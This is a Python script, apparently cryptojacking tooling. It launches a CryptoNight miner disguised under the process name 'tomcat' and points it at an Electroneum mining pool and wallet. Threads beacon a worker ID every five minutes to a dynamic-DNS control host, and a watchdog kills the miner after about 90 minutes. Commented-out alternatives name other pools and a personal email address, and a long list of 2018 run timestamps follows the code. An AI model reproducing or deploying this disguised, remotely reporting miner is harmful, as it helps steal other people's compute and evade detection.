import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:12:05.096492
#2018-02-17 16:58:03.419766
#2018-02-17 18:47:06.127762
#2018-02-17 20:36:05.051894
#2018-02-17 22:22:07.730345
#2018-02-18 00:06:05.336237
#2018-02-18 01:57:05.600797
#2018-02-18 03:45:07.679696
#2018-02-18 05:33:06.101853
#2018-02-18 07:26:06.366632
#2018-02-18 09:13:05.166006
#2018-02-18 10:59:05.957460
#2018-02-18 12:46:06.512020
#2018-02-18 14:31:04.051919
#2018-02-18 16:22:01.689634
#2018-02-18 18:11:05.248368
#2018-02-18 19:57:01.662487
#2018-02-18 21:43:06.062995
#2018-02-18 23:32:04.743203
#2018-02-19 01:18:07.612554
#2018-02-19 03:06:07.642162
#2018-02-19 04:51:03.866364
#2018-02-19 06:36:01.979017
#2018-02-19 08:24:07.284036
#2018-02-19 10:14:01.394255
#2018-02-19 12:02:08.216235
#2018-02-19 13:49:01.616326
#2018-02-19 15:37:06.856374
#2018-02-19 17:25:10.377469
#2018-02-19 19:13:07.390454
#2018-02-19 20:59:06.585722
#2018-02-19 22:47:09.249870
#2018-02-20 00:30:07.599446
#2018-02-20 02:17:07.824507
#2018-02-20 04:07:07.338956
#2018-02-20 05:50:04.755032
#2018-02-20 07:36:01.912725
#2018-02-20 09:20:01.775662
#2018-02-20 11:04:04.689676
#2018-02-20 12:51:05.973774
#2018-02-20 14:36:10.167412
#2018-02-20 16:20:10.608542
#2018-02-20 18:08:06.981139
#2018-02-20 19:59:03.721601
#2018-02-20 21:47:07.038083
#2018-02-20 23:28:07.381687
#2018-02-21 01:13:07.937691
#2018-02-21 03:01:04.730882
#2018-02-21 04:48:02.107562
#2018-02-21 06:31:06.904811
#2018-02-21 08:17:04.114418
#2018-02-21 10:03:01.433130
#2018-02-21 11:50:09.872490
#2018-02-21 13:41:08.328635
#2018-02-21 15:25:06.727946
#2018-02-21 17:15:10.088836
#2018-02-21 19:04:03.124099
#2018-02-21 20:52:02.177167
#2018-02-21 22:37:07.692161
#2018-02-22 00:27:05.197080
#2018-02-22 02:16:06.887380
#2018-02-22 04:02:07.837695
#2018-02-22 05:48:05.541245
#2018-02-22 07:33:07.151456
#2018-02-22 09:23:05.684872
#2018-02-22 11:08:07.416636
#2018-02-22 12:55:11.555355
#2018-02-22 14:44:07.456887
#2018-02-22 16:31:01.265919
#2018-02-22 18:17:01.980241
#2018-02-22 20:07:07.865115
#2018-02-22 21:55:01.442580
#2018-02-22 23:42:01.372325
#2018-02-23 01:31:04.673034
#2018-02-23 03:18:03.475780
#2018-02-23 05:06:01.704557
#2018-02-23 06:51:07.365650
#2018-02-23 08:35:05.745623
#2018-02-23 10:49:01.620107
#2018-02-23 12:48:01.867598
#2018-02-23 14:31:06.329387
#2018-02-23 16:21:05.085666
#2018-02-23 18:07:07.416173
#2018-02-23 19:52:05.093989
#2018-02-23 21:36:02.226377
#2018-02-23 23:23:07.467680
#2018-02-24 01:16:05.377555
#2018-02-24 03:07:07.368772
#2018-02-24 04:53:01.276195
#2018-02-24 06:37:02.084632
#2018-02-24 08:25:07.845457
#2018-02-24 08:26:05.233185
#2018-02-24 10:10:07.158477
#2018-02-24 11:53:03.446350
#2018-02-24 13:20:08.796612
#2018-02-24 14:52:05.324989
#2018-02-24 16:26:01.527985
#2018-02-24 18:01:06.190305
#2018-02-24 19:34:06.417712
#2018-02-24 21:10:07.160755
#2018-02-24 23:12:07.046501
#2018-02-25 01:34:06.060878
#2018-02-25 05:24:05.238905
#2018-02-25 11:34:04.292951